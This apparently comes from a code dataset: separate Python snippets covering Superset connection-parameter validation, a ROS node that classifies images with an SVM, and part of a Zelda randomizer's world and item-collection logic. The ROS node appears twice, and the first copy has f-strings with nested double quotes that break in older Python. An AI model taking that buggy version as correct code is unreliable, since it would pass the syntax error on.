def build_sqlalchemy_uri( # pylint: disable=unused-argument
cls,
parameters: BasicParametersType,
encryted_extra: Optional[Dict[str, str]] = None,
) -> str:
# make a copy so that we don't update the original
query = parameters.get("query", {}).copy()
if parameters.get("encryption"):
if not cls.encryption_parameters:
raise Exception("Unable to build a URL with encryption enabled")
query.update(cls.encryption_parameters)
return str(
URL(
f"{cls.engine}+{cls.default_driver}".rstrip("+"), # type: ignore
username=parameters.get("username"),
password=parameters.get("password"),
host=parameters["host"],
port=parameters["port"],
database=parameters["database"],
query=query,
)
)
@classmethod
def get_parameters_from_uri( # pylint: disable=unused-argument
cls, uri: str, encrypted_extra: Optional[Dict[str, Any]] = None
) -> BasicParametersType:
url = make_url(uri)
query = {
key: value
for (key, value) in url.query.items()
if (key, value) not in cls.encryption_parameters.items()
}
encryption = all(
item in url.query.items() for item in cls.encryption_parameters.items()
)
return {
"username": url.username,
"password": url.password,
"host": url.host,
"port": url.port,
"database": url.database,
"query": query,
"encryption": encryption,
}
@classmethod
def validate_parameters(
cls, parameters: BasicParametersType
) -> List[SupersetError]:
"""
Validates any number of parameters, for progressive validation.
If only the hostname is present it will check if the name is resolvable. As more
parameters are present in the request, more validation is done.
"""
errors: List[SupersetError] = []
required = {"host", "port", "username", "database"}
present = {key for key in parameters if parameters.get(key, ())}
missing = sorted(required - present)
if missing:
errors.append(
SupersetError(
message=f'One or more parameters are missing: {", ".join(missing)}',
error_type=SupersetErrorType.CONNECTION_MISSING_PARAMETERS_ERROR,
level=ErrorLevel.WARNING,
extra={"missing": missing},
),
)
host = parameters.get("host", None)
if not host:
return errors
if not is_hostname_valid(host):
errors.append(
SupersetError(
message="The hostname provided can't be resolved.",
error_type=SupersetErrorType.CONNECTION_INVALID_HOSTNAME_ERROR,
level=ErrorLevel.ERROR,
extra={"invalid": ["host"]},
),
)
return errors
port = parameters.get("port", None)
if not port:
return errors
try:
port = int(port)
except (ValueError, TypeError):
errors.append(
SupersetError(
message="Port must be a valid integer.",
error_type=SupersetErrorType.CONNECTION_INVALID_PORT_ERROR,
level=ErrorLevel.ERROR,
extra={"invalid": ["port"]},
),
)
if not (isinstance(port, int) and 0 <= port < 2 ** 16):
errors.append(
SupersetError(
message=(
"The port must be an integer between 0 and 65535 "
"(inclusive)."
),
error_type=SupersetErrorType.CONNECTION_INVALID_PORT_ERROR,
level=ErrorLevel.ERROR,
extra={"invalid": ["port"]},
),
)
elif not is_port_open(host, port):
errors.append(
SupersetError(
message="The port is closed.",
error_type=SupersetErrorType.CONNECTION_PORT_CLOSED_ERROR,
level=ErrorLevel.ERROR,
extra={"invalid": ["port"]},
),
)
return errors
@classmethod
def parameters_json_schema(cls) -> Any:
"""
Return configuration parameters as OpenAPI.
"""
if not cls.parameters_schema:
return None
spec = APISpec(
title="Database Parameters",
version="1.0.0",
openapi_version="3.0.2",
plugins=[MarshmallowPlugin()],
)
spec.components.schema(cls.__name__, schema=cls.parameters_schema)
return spec.to_dict()["components"]["schemas"][cls.__name__]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import cv2
import rospy
import rospkg
import numpy as np
from joblib import load
from sklearn import svm
from std_msgs.msg import Empty, String
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge
from ecs.srv import Descriptor
class ImageBasedEnvironmentClassification:
def __init__(self):
# load parameters
self.settings = None
self.load_settings()
rospack = rospkg.RosPack()
self.classifier_path = os.path.join(rospack.get_path(
self.settings["classifier_pkg"]), self.settings["classifier_file"])
self.image_subscriber = rospy.Subscriber(
self.settings["camera_topic"], CompressedImage, callback=self.image_subscriber_callback, queue_size=1)
self.trigger_subscriber = rospy.Subscriber(
self.settings["trigger_topic"], Empty, callback=self.trigger_callback, queue_size=1)
self.decision_publisher = rospy.Publisher(
self.settings["decision_topic"], String, queue_size=10)
self.print_info(f"Loaded classifier: {self.classifier_path}")
self.print_info(f"Camera topic: {self.settings["camera_topic"]}")
self.print_info(f"Trigger topic: {self.settings["trigger_topic"]}")
self.print_info(f"Decision topic: {self.settings["decision_topic"]}")
self.img = None
self.cv_bridge = CvBridge()
self.classifier = load(self.classifier_path)
def print_info(self, msg):
rospy.loginfo(f"[{rospy.get_name()}]: {msg}")
def load_settings(self):
self.settings = rospy.get_param("ecs_ibec")
def image_subscriber_callback(self, msg):
data_arr = np.frombuffer(msg.data, np.uint8)
#data_arr = np.fromstring(msg.data, np.uint8)
self.img = cv2.imdecode(data_arr, cv2.IMREAD_COLOR)
#self.img = self.cv_bridge.imgmsg_to_cv2(
# msg, desired_encoding="CV_8UC3")
def descriptor_service_client(self):
rospy.wait_for_service(self.settings["descriptor_service"])
if self.img is None:
return None
try:
descriptor_service = rospy.ServiceProxy(
self.settings["descriptor_service"], Descriptor)
resp1 = descriptor_service(
self.cv_bridge.cv2_to_imgmsg(self.img, encoding="bgr8"))
return resp1.data
except rospy.ServiceException as e:
print("Service call failed: %s" % e)
def trigger_callback(self, msg):
self.process()
def process(self):
desc_vector = np.asarray(self.descriptor_service_client())
if desc_vector is None:
return
prediction = self.classifier.predict(desc_vector.reshape(1, -1))[0]
self.print_info(f"prediction: {prediction}")
prediction_text = self.settings.get("class_mapping").get(str(prediction))
if prediction_text is None:
self.print_info(f"Unknown class prediction [class mapping is missing]")
return
self.decision_publisher.publish(prediction_text)
if __name__ == "__main__":
rospy.init_node("ecs_classification_classic_node")
ibec = ImageBasedEnvironmentClassification()
rospy.spin()
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import cv2
import rospy
import rospkg
import numpy as np
from joblib import load
from sklearn import svm
from std_msgs.msg import Empty, String
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge
from ecs.srv import Descriptor
class ImageBasedEnvironmentClassification:
def __init__(self):
# load parameters
self.settings = None
self.load_settings()
rospack = rospkg.RosPack()
self.classifier_path = os.path.join(rospack.get_path(
self.settings["classifier_pkg"]), self.settings["classifier_file"])
self.image_subscriber = rospy.Subscriber(
self.settings["camera_topic"], CompressedImage, callback=self.image_subscriber_callback, queue_size=1)
self.trigger_subscriber = rospy.Subscriber(
self.settings["trigger_topic"], Empty, callback=self.trigger_callback, queue_size=1)
self.decision_publisher = rospy.Publisher(
self.settings["decision_topic"], String, queue_size=10)
self.print_info(f"Loaded classifier: {self.classifier_path}")
self.print_info(f"Camera topic: {self.settings['camera_topic']}")
self.print_info(f"Trigger topic: {self.settings['trigger_topic']}")
self.print_info(f"Decision topic: {self.settings['decision_topic']}")
self.img = None
self.cv_bridge = CvBridge()
self.classifier = load(self.classifier_path)
def print_info(self, msg):
rospy.loginfo(f"[{rospy.get_name()}]: {msg}")
def load_settings(self):
self.settings = rospy.get_param("ecs_ibec")
def image_subscriber_callback(self, msg):
data_arr = np.frombuffer(msg.data, np.uint8)
#data_arr = np.fromstring(msg.data, np.uint8)
self.img = cv2.imdecode(data_arr, cv2.IMREAD_COLOR)
#self.img = self.cv_bridge.imgmsg_to_cv2(
# msg, desired_encoding="CV_8UC3")
def descriptor_service_client(self):
rospy.wait_for_service(self.settings["descriptor_service"])
if self.img is None:
return None
try:
descriptor_service = rospy.ServiceProxy(
self.settings["descriptor_service"], Descriptor)
resp1 = descriptor_service(
self.cv_bridge.cv2_to_imgmsg(self.img, encoding="bgr8"))
return resp1.data
except rospy.ServiceException as e:
print("Service call failed: %s" % e)
def trigger_callback(self, msg):
self.process()
def process(self):
desc_vector = np.asarray(self.descriptor_service_client())
if desc_vector is None:
return
prediction = self.classifier.predict(desc_vector.reshape(1, -1))[0]
self.print_info(f"prediction: {prediction}")
prediction_text = self.settings.get("class_mapping").get(str(prediction))
if prediction_text is None:
self.print_info(f"Unknown class prediction [class mapping is missing]")
return
self.decision_publisher.publish(prediction_text)
if __name__ == "__main__":
rospy.init_node("ecs_classification_classic_node")
ibec = ImageBasedEnvironmentClassification()
rospy.spin()
|
import copy
from enum import Enum, unique
import logging
import json
from collections import OrderedDict
from collections_extended import bag
from EntranceShuffle import door_addresses
from Utils import int16_as_bytes
class World(object):
def __init__(self, players, shuffle, logic, mode, swords, difficulty, difficulty_adjustments, timer, progressive, goal, algorithm, accessibility, shuffle_ganon, retro, custom, customitemarray, hints):
self.players = players
self.teams = 1
self.shuffle = shuffle.copy()
self.logic = logic.copy()
self.mode = mode.copy()
self.swords = swords.copy()
self.difficulty = difficulty.copy()
self.difficulty_adjustments = difficulty_adjustments.copy()
self.timer = timer
self.progressive = progressive
self.goal = goal.copy()
self.algorithm = algorithm
self.dungeons = []
self.regions = []
self.shops = []
self.itempool = []
self.seed = None
self.precollected_items = []
self.state = CollectionState(self)
self._cached_entrances = None
self._cached_locations = None
self._entrance_cache = {}
self._location_cache = {}
self.required_locations = []
self.shuffle_bonk_prizes = False
self.light_world_light_cone = False
self.dark_world_light_cone = False
self.clock_mode = 'off'
self.rupoor_cost = 10
self.aga_randomness = True
self.lock_aga_door_in_escape = False
self.save_and_quit_from_boss = True
self.accessibility = accessibility.copy()
self.shuffle_ganon = shuffle_ganon
self.fix_gtower_exit = self.shuffle_ganon
self.retro = retro.copy()
self.custom = custom
self.customitemarray = customitemarray
self.can_take_damage = True
self.hints = hints.copy()
self.dynamic_regions = []
self.dynamic_locations = []
self.spoiler = Spoiler(self)
self.lamps_needed_for_dark_rooms = 1
for player in range(1, players + 1):
def set_player_attr(attr, val):
self.__dict__.setdefault(attr, {})[player] = val
set_player_attr('_region_cache', {})
set_player_attr('player_names', [])
set_player_attr('remote_items', False)
set_player_attr('required_medallions', ['Ether', 'Quake'])
set_player_attr('swamp_patch_required', False)
set_player_attr('powder_patch_required', False)
set_player_attr('ganon_at_pyramid', True)
set_player_attr('ganonstower_vanilla', True)
set_player_attr('sewer_light_cone', self.mode[player] == 'standard')
set_player_attr('fix_trock_doors', self.shuffle[player] != 'vanilla' or self.mode[player] == 'inverted')
set_player_attr('fix_skullwoods_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
set_player_attr('fix_palaceofdarkness_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
set_player_attr('fix_trock_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
set_player_attr('can_access_trock_eyebridge', None)
set_player_attr('can_access_trock_front', None)
set_player_attr('can_access_trock_big_chest', None)
set_player_attr('can_access_trock_middle', None)
set_player_attr('fix_fake_world', True)
set_player_attr('mapshuffle', False)
set_player_attr('compassshuffle', False)
set_player_attr('keyshuffle', False)
set_player_attr('bigkeyshuffle', False)
set_player_attr('difficulty_requirements', None)
set_player_attr('boss_shuffle', 'none')
set_player_attr('enemy_shuffle', 'none')
set_player_attr('enemy_health', 'default')
set_player_attr('enemy_damage', 'default')
set_player_attr('beemizer', 0)
set_player_attr('progressive', 'on')
set_player_attr('escape_assist', [])
set_player_attr('crystals_needed_for_ganon', 7)
set_player_attr('crystals_needed_for_gt', 7)
set_player_attr('open_pyramid', False)
set_player_attr('treasure_hunt_icon', 'Triforce Piece')
set_player_attr('treasure_hunt_count', 0)
def get_name_string_for_object(self, obj):
return obj.name if self.players == 1 else f'{obj.name} ({self.get_player_names(obj.player)})'
def get_player_names(self, player):
return ", ".join([name for i, name in enumerate(self.player_names[player]) if self.player_names[player].index(name) == i])
def initialize_regions(self, regions=None):
for region in regions if regions else self.regions:
region.world = self
self._region_cache[region.player][region.name] = region
def get_regions(self, player=None):
return self.regions if player is None else self._region_cache[player].values()
def get_region(self, regionname, player):
if isinstance(regionname, Region):
return regionname
try:
return self._region_cache[player][regionname]
except KeyError:
for region in self.regions:
if region.name == regionname and region.player == player:
assert not region.world # this should only happen before initialization
return region
raise RuntimeError('No such region %s for player %d' % (regionname, player))
def get_entrance(self, entrance, player):
if isinstance(entrance, Entrance):
return entrance
try:
return self._entrance_cache[(entrance, player)]
except KeyError:
for region in self.regions:
for exit in region.exits:
if exit.name == entrance and exit.player == player:
self._entrance_cache[(entrance, player)] = exit
return exit
raise RuntimeError('No such entrance %s for player %d' % (entrance, player))
def get_location(self, location, player):
if isinstance(location, Location):
return location
try:
return self._location_cache[(location, player)]
except KeyError:
for region in self.regions:
for r_location in region.locations:
if r_location.name == location and r_location.player == player:
self._location_cache[(location, player)] = r_location
return r_location
raise RuntimeError('No such location %s for player %d' % (location, player))
def get_dungeon(self, dungeonname, player):
if isinstance(dungeonname, Dungeon):
return dungeonname
for dungeon in self.dungeons:
if dungeon.name == dungeonname and dungeon.player == player:
return dungeon
raise RuntimeError('No such dungeon %s for player %d' % (dungeonname, player))
def get_all_state(self, keys=False):
ret = CollectionState(self)
def soft_collect(item):
if item.name.startswith('Progressive '):
if 'Sword' in item.name:
if ret.has('Golden Sword', item.player):
pass
elif ret.has('Tempered Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 4:
ret.prog_items.add(('Golden Sword', item.player))
elif ret.has('Master Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 3:
ret.prog_items.add(('Tempered Sword', item.player))
elif ret.has('Fighter Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 2:
ret.prog_items.add(('Master Sword', item.player))
elif self.difficulty_requirements[item.player].progressive_sword_limit >= 1:
ret.prog_items.add(('Fighter Sword', item.player))
elif 'Glove' in item.name:
if ret.has('Titans Mitts', item.player):
pass
elif ret.has('Power Glove', item.player):
ret.prog_items.add(('Titans Mitts', item.player))
else:
ret.prog_items.add(('Power Glove', item.player))
elif 'Shield' in item.name:
if ret.has('Mirror Shield', item.player):
pass
elif ret.has('Red Shield', item.player) and self.difficulty_requirements[item.player].progressive_shield_limit >= 3:
ret.prog_items.add(('Mirror Shield', item.player))
elif ret.has('Blue Shield', item.player) and self.difficulty_requirements[item.player].progressive_shield_limit >= 2:
ret.prog_items.add(('Red Shield', item.player))
elif self.difficulty_requirements[item.player].progressive_shield_limit >= 1:
ret.prog_items.add(('Blue Shield', item.player))
elif 'Bow' in item.name:
if ret.has('Silver Arrows', item.player):
pass
elif ret.has('Bow', item.player) and self.difficulty_requirements[item.player].progressive_bow_limit >= 2:
ret.prog_items.add(('Silver Arrows', item.player))
elif self.difficulty_requirements[item.player].progressive_bow_limit >= 1:
ret.prog_items.add(('Bow', item.player))
elif item.name.startswith('Bottle'):
if ret.bottle_count(item.player) < self.difficulty_requirements[item.player].progressive_bottle_limit:
ret.prog_items.add((item.name, item.player))
elif item.advancement or item.smallkey or item.bigkey:
ret.prog_items.add((item.name, item.player))
for item in self.itempool:
soft_collect(item)
if keys:
for p in range(1, self.players + 1):
from Items import ItemFactory
for item in ItemFactory(['Small Key (Escape)', 'Big Key (Eastern Palace)', 'Big Key (Desert Palace)', 'Small Key (Desert Palace)', 'Big Key (Tower of Hera)', 'Small Key (Tower of Hera)', 'Small Key (Agahnims Tower)', 'Small Key (Agahnims Tower)',
'Big Key (Palace of Darkness)'] + ['Small Key (Palace of Darkness)'] * 6 + ['Big Key (Thieves Town)', 'Small Key (Thieves Town)', 'Big Key (Skull Woods)'] + ['Small Key (Skull Woods)'] * 3 + ['Big Key (Swamp Palace)',
'Small Key (Swamp Palace)', 'Big Key (Ice Palace)'] + ['Small Key (Ice Palace)'] * 2 + ['Big Key (Misery Mire)', 'Big Key (Turtle Rock)', 'Big Key (Ganons Tower)'] + ['Small Key (Misery Mire)'] * 3 + ['Small Key (Turtle Rock)'] * 4 + ['Small Key (Ganons Tower)'] * 4,
p):
soft_collect(item)
ret.sweep_for_events()
return ret
def get_items(self):
return [loc.item for loc in self.get_filled_locations()] + self.itempool
def find_items(self, item, player):
return [location for location in self.get_locations() if location.item is not None and location.item.name == item and location.item.player == player]
def push_precollected(self, item):
item.world = self
if (item.smallkey and self.keyshuffle[item.player]) or (item.bigkey and self.bigkeyshuffle[item.player]):
item.advancement = True
self.precollected_items.append(item)
self.state.collect(item, True)
def push_item(self, location, item, collect=True):
if not isinstance(location, Location):
raise RuntimeError('Cannot assign item %s to location %s (player %d).' % (item, location, item.player))
if location.can_fill(self.state, item, False):
location.item = item
item.location = location
item.world = self
if collect:
self.state.collect(item, location.event, location)
logging.getLogger('').debug('Placed %s at %s', item, location)
else:
raise RuntimeError('Cannot assign item %s to location %s.' % (item, location))
def get_entrances(self):
if self._cached_entrances is None:
self._cached_entrances = []
for region in self.regions:
self._cached_entrances.extend(region.entrances)
return self._cached_entrances
def clear_entrance_cache(self):
self._cached_entrances = None
def get_locations(self):
if self._cached_locations is None:
self._cached_locations = []
for region in self.regions:
self._cached_locations.extend(region.locations)
return self._cached_locations
def clear_location_cache(self):
self._cached_locations = None
def get_unfilled_locations(self, player=None):
return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is None]
def get_filled_locations(self, player=None):
return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is not None]
def get_reachable_locations(self, state=None, player=None):
if state is None:
state = self.state
return [location for location in self.get_locations() if (player is None or location.player == player) and location.can_reach(state)]
def get_placeable_locations(self, state=None, player=None):
if state is None:
state = self.state
return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is None and location.can_reach(state)]
def unlocks_new_location(self, item):
temp_state = self.state.copy()
temp_state.collect(item, True)
for location in self.get_unfilled_locations():
if temp_state.can_reach(location) and not self.state.can_reach(location):
return True
return False
def has_beaten_game(self, state, player=None):
if player:
return state.has('Triforce', player)
else:
return all((self.has_beaten_game(state, p) for p in range(1, self.players + 1)))
def can_beat_game(self, starting_state=None):
if starting_state:
state = starting_state.copy()
else:
state = CollectionState(self)
if self.has_beaten_game(state):
return True
prog_locations = [location for location in self.get_locations() if location.item is not None and (location.item.advancement or location.event) and location not in state.locations_checked]
while prog_locations:
sphere = []
# build up spheres of collection radius. Everything in each sphere is independent from each other in dependencies and only depends on lower spheres
for location in prog_locations:
if location.can_reach(state):
sphere.append(location)
if not sphere:
# ran out of places and did not finish yet, quit
return False
for location in sphere:
prog_locations.remove(location)
state.collect(location.item, True, location)
if self.has_beaten_game(state):
return True
return False
class CollectionState(object):
def __init__(self, parent):
self.prog_items = bag()
self.world = parent
self.reachable_regions = {player: set() for player in range(1, parent.players + 1)}
self.events = []
self.path = {}
self.locations_checked = set()
self.stale = {player: True for player in range(1, parent.players + 1)}
for item in parent.precollected_items:
self.collect(item, True)
def update_reachable_regions(self, player):
player_regions = self.world.get_regions(player)
self.stale[player] = False
rrp = self.reachable_regions[player]
new_regions = True
reachable_regions_count = len(rrp)
while new_regions:
player_regions = [region for region in player_regions if region not in rrp]
for candidate in player_regions:
if candidate.can_reach_private(self):
rrp.add(candidate)
new_regions = len(rrp) > reachable_regions_count
reachable_regions_count = len(rrp)
def copy(self):
ret = CollectionState(self.world)
ret.prog_items = self.prog_items.copy()
ret.reachable_regions = {player: copy.copy(self.reachable_regions[player]) for player in range(1, self.world.players + 1)}
ret.events = copy.copy(self.events)
ret.path = copy.copy(self.path)
ret.locations_checked = copy.copy(self.locations_checked)
return ret
def can_reach(self, spot, resolution_hint=None, player=None):
try:
spot_type = spot.spot_type
except AttributeError:
# try to resolve a name
if resolution_hint == 'Location':
spot = self.world.get_location(spot, player)
elif resolution_hint == 'Entrance':
spot = self.world.get_entrance(spot, player)
else:
# default to Region
spot = self.world.get_region(spot, player)
return spot.can_reach(self)
def sweep_for_events(self, key_only=False, locations=None):
# this may need improvement
if locations is None:
locations = self.world.get_filled_locations()
new_locations = True
checked_locations = 0
while new_locations:
reachable_events = [location for location in locations if location.event and
(not key_only or (not self.world.keyshuffle[location.item.player] and location.item.smallkey) or (not self.world.bigkeyshuffle[location.item.player] and location.item.bigkey))
and location.can_reach(self)]
for event in reachable_events:
if (event.name, event.player) not in self.events:
self.events.append((event.name, event.player))
self.collect(event.item, True, event)
new_locations = len(reachable_events) > checked_locations
checked_locations = len(reachable_events)
def has(self, item, player, count=1):
if count == 1:
return (item, player) in self.prog_items
return self.prog_items.count((item, player)) >= count
def has_key(self, item, player, count=1):
if self.world.retro[player]:
return self.can_buy_unlimited('Small Key (Universal)', player)
if count == 1:
return (item, player) in self.prog_items
return self.prog_items.count((item, player)) >= count
def can_buy_unlimited(self, item, player):
for shop in self.world.shops:
if shop.region.player == player and shop.has_unlimited(item) and shop.region.can_reach(self):
return True
return False
def item_count(self, item, player):
return self.prog_items.count((item, player))
def has_crystals(self, count, player):
crystals = ['Crystal 1', 'Crystal 2', 'Crystal 3', 'Crystal 4', 'Crystal 5', 'Crystal 6', 'Crystal 7']
return len([crystal for crystal in crystals if self.has(crystal, player)]) >= count
def can_lift_rocks(self, player):
return self.has('Power Glove', player) or self.has('Titans Mitts', player)
def has_bottle(self, player):
return self.bottle_count(player) > 0
def bottle_count(self, player):
return len([item for (item, itemplayer) in self.prog_items if item.startswith('Bottle') and itemplayer == player])
def has_hearts(self, player, count):
# Warning: This only considers items that are marked as advancement items
return self.heart_count(player) >= count
def heart_count(self, player):
# Warning: This only considers items that are marked as advancement items
diff = self.world.difficulty_requirements[player]
return (
min(self.item_count('Boss Heart Container', player), diff.boss_heart_container_limit)
+ self.item_count('Sanctuary Heart Container', player)
+ min(self.item_count('Piece of Heart', player), diff.heart_piece_limit) // 4
+ 3 # starting hearts
)
def can_lift_heavy_rocks(self, player):
return self.has('Titans Mitts', player)
def can_extend_magic(self, player, smallmagic=16, fullrefill=False): #This reflects the total magic Link has, not the total extra he has.
basemagic = 8
if self.has('Quarter Magic', player):
basemagic = 32
elif self.has('Half Magic', player):
basemagic = 16
if self.can_buy_unlimited('Green Potion', player) or self.can_buy_unlimited('Blue Potion', player):
if self.world.difficulty_adjustments[player] == 'hard' and not fullrefill:
basemagic = basemagic + int(basemagic * 0.5 * self.bottle_count(player))
elif self.world.difficulty_adjustments[player] == 'expert' and not fullrefill:
basemagic = basemagic + int(basemagic * 0.25 * self.bottle_count(player))
else:
basemagic = basemagic + basemagic * self.bottle_count(player)
return basemagic >= smallmagic
def can_kill_most_things(self, player, enemies=5):
return (self.has_blunt_weapon(player)
or self.has('Cane of Somaria', player)
or (self.has('Cane of Byrna', player) and (enemies < 6 or self.can_extend_magic(player)))
or self.can_shoot_arrows(player)
or self.has('Fire Rod', player)
)
def can_shoot_arrows(self, player):
if self.world.retro[player]:
#TODO: need to decide how we want to handle wooden arrows longer-term (a can-buy-a check, or via dynamic shop location)
#FIXME: Should do something about hard+ ganon only silvers. For the moment, i believe they effective grant wooden, so we are safe
return self.has('Bow', player) and (self.has('Silver Arrows', player) or self.can_buy_unlimited('Single Arrow', player))
return self.has('Bow', player)
def can_get_good_bee(self, player):
cave = self.world.get_region('Good Bee Cave', player)
return (
self.has_bottle(player) and
self.has('Bug Catching Net', player) and
(self.has_Boots(player) or (self.has_sword(player) and self.has('Quake', player))) and
cave.can_reach(self) and
self.is_not_bunny(cave, player)
)
def has_sword(self, player):
return self.has('Fighter Sword', player) or self.has('Master Sword', player) or self.has('Tempered Sword', player) or self.has('Golden Sword', player)
def has_beam_sword(self, player):
return self.has('Master Sword', player) or self.has('Tempered Sword', player) or self.has('Golden Sword', player)
def has_blunt_weapon(self, player):
return self.has_sword(player) or self.has('Hammer', player)
def has_Mirror(self, player):
return self.has('Magic Mirror', player)
def has_Boots(self, player):
return self.has('Pegasus Boots', player)
def has_Pearl(self, player):
return self.has('Moon Pearl', player)
def has_fire_source(self, player):
return self.has('Fire Rod', player) or self.has('Lamp', player)
def can_flute(self, player):
lw = self.world.get_region('Light World', player)
return self.has('Ocarina', player) and lw.can_reach(self) and self.is_not_bunny(lw, player)
def can_melt_things(self, player):
return self.has('Fire Rod', player) or (self.has('Bombos', player) and self.has_sword(player))
def can_avoid_lasers(self, player):
return self.has('Mirror Shield', player) or self.has('Cane of Byrna', player) or self.has('Cape', player)
def is_not_bunny(self, region, player):
if self.has_Pearl(player):
return True
return region.is_light_world if self.world.mode[player] != 'inverted' else region.is_dark_world
def can_reach_light_world(self, player):
if True in [i.is_light_world for i in self.reachable_regions[player]]:
return True
return False
def can_reach_dark_world(self, player):
if True in [i.is_dark_world for i in self.reachable_regions[player]]:
return True
return False
def has_misery_mire_medallion(self, player):
return self.has(self.world.required_medallions[player][0], player)
def has_turtle_rock_medallion(self, player):
return self.has(self.world.required_medallions[player][1], player)
def collect(self, item, event=False, location=None):
if location:
self.locations_checked.add(location)
changed = False
if item.name.startswith('Progressive '):
if 'Sword' in item.name:
if self.has('Golden Sword', item.player):
pass
elif self.has('Tempered Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 4:
self.prog_items.add(('Golden Sword', item.player))
changed = True
elif self.has('Master Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 3:
self.prog_items.add(('Tempered Sword', item.player))
changed = True
elif self.has('Fighter Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 2:
self.prog_items.add(('Master Sword', item.player))
changed = True
elif self.world.difficulty_requirements[item.player].progressive_sword_limit >= 1:
self.prog_items.add(('Fighter Sword', item.player))
changed = True
elif 'Glove' in item.name:
if self.has('Titans Mitts', item.player):
pass
elif self.has('Power Glove', item.player):
self.prog_items.add(('Titans Mitts', item.player))
changed = True
else:
self.prog_items.add(('Power Glove', item.player))
changed = True
elif 'Shield' in item.name:
if self.has('Mirror Shield', item.player):
pass
elif self.has('Red Shield', item.player) and self.world.difficulty_requirements[item.player].progressive_shield_limit >= 3:
self.prog_items.add(('Mirror Shield', item.player))
changed = True
elif self.has('Blue Shield', item.player) and self.world.difficulty_requirements[item.player].progressive_shield_limit >= 2:
self.prog_items.add(('Red Shield', item.player))
changed = True
elif self.world.difficulty_requirements[item.player].progressive_shield_limit >= 1:
self.prog_items.add(('Blue Shield', item.player))
changed = True
elif 'Bow' in item.name:
if self.has('Silver Arrows', item.player):
pass
elif self.has('Bow', item.player):
self.prog_items.add(('Silver Arrows', item.player))
changed = True
else:
self.prog_items.add(('Bow', item.player))
changed = True
elif item.name.startswith('Bottle'):
if self.bottle_count(item.player) < self.world.difficulty_requirements[item.player].progressive_bottle_limit:
self.prog_items.add((item.name, item.player))
changed = True
elif event or item.advancement:
self.prog_items.add((item.name, item.player))
changed = True
self.stale[item.player] = True
if changed:
if not event:
self.sweep_for_events()
def remove(self, item):
if item.advancement:
to_remove = item.name
if to_remove.startswith('Progressive '):
if 'Sword' in to_remove:
if self.has('Golden Sword', item.player):
to_remove = 'Golden Sword'
elif self.has('Tempered Sword', item.player):
to_remove = 'Tempered Sword'
elif self.has('Master Sword', item.player):
to_remove = 'Master Sword'
elif self.has('Fighter Sword', item.player):
to_remove = 'Fighter Sword'
else:
to_remove = None
elif 'Glove' in item.name:
if self.has('Titans Mitts', item.player):
to_remove = 'Titans Mitts'
elif self.has('Power Glove', item.player):
to_remove = 'Power Glove'
else:
to_remove = None
elif 'Shield' in item.name:
if self.has('Mirror Shield', item.player):
to_remove = 'Mirror Shield'
elif self.has('Red Shield', item.player):
to_remove = 'Red Shield'
elif self.has('Blue Shield', item.player):
to_remove = 'Blue Shield'
else:
to_remove = 'None'
elif 'Bow' in item.name:
if self.has('Silver Arrows', item.player):
to_remove = 'Silver Arrows'
elif self.has('Bow', item.player):
to_remove = 'Bow'
else:
to_remove = None
if to_remove is not None:
try:
self.prog_items.remove((to_remove, item.player))
except ValueError:
return
# invalidate caches, nothing can be trusted anymore now
self.reachable_regions[item.player] = set()
self.stale[item.player] = True
def __getattr__(self, item):
if item.startswith('can_reach_'):
return self.can_reach(item[10])
#elif item.startswith('has_'):
# return self.has(item[4])
if item == '__len__':
return
raise RuntimeError('Cannot parse %s.' % item)
@unique
class RegionType(Enum):
LightWorld = 1
DarkWorld = 2
Cave = 3 # Also includes Houses
Dungeon = 4
@property
def is_indoors(self):
"""Shorthand for checking if Cave or Dungeon"""
return self in (RegionType.Cave, RegionType.Dungeon)
class Region(object):
def __init__(self, name, type, hint, player):
self.name = name
self.type = type
self.entrances = []
self.exits = []
self.locations = []
self.dungeon = None
self.shop = None
self.world = None
self.is_light_world = False # will be set aftermaking connections.
self.is_dark_world = False
self.spot_type = 'Region'
self.hint_text = hint
self.recursion_count = 0
self.player = player
def can_reach(self, state):
if state.stale[self.player]:
state.update_reachable_regions(self.player)
return self in state.reachable_regions[self.player]
def can_reach_private(self, state):
for entrance in self.entrances:
if entrance.can_reach(state):
if not self in state.path:
state.path[self] = (self.name, state.path.get(entrance, None))
return True
return False
def can_fill(self, item):
inside_dungeon_item = ((item.smallkey and not self.world.keyshuffle[item.player])
or (item.bigkey and not self.world.bigkeyshuffle[item.player])
or (item.map and not self.world.mapshuffle[item.player])
or (item.compass and not self.world.compassshuffle[item.player]))
sewer_hack = self.world.mode[item.player] == 'standard' and item.name == 'Small Key (Escape)'
if sewer_hack or inside_dungeon_item:
return self.dungeon and self.dungeon.is_dungeon_item(item) and item.player == self.player
return True
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
class Entrance(object):
def __init__(self, player, name='', parent=None):
self.name = name
self.parent_region = parent
self.connected_region = None
self.target = None
self.addresses = None
self.spot_type = 'Entrance'
self.recursion_count = 0
self.vanilla = None
self.access_rule = lambda state: True
self.player = player
def can_reach(self, state):
if self.parent_region.can_reach(state) and self.access_rule(state):
if not self in state.path:
state.path[self] = (self.name, state.path.get(self.parent_region, (self.parent_region.name, None)))
return True
return False
def connect(self, region, addresses=None, target=None, vanilla=None):
self.connected_region = region
self.target = target
self.addresses = addresses
self.vanilla = vanilla
region.entrances.append(self)
def __str__(self):
return str(self.__unicode__())
def __unicode__(self):
world = self.parent_region.world if self.parent_region else None
return world.get_name_string_for_object(self) if world else f'{self.name} (Player {self.player})'
class Dungeon(object):
def __init__(self, name, regions, big_key, small_keys, dungeon_items, player):
self.name = name
self.regions = regions
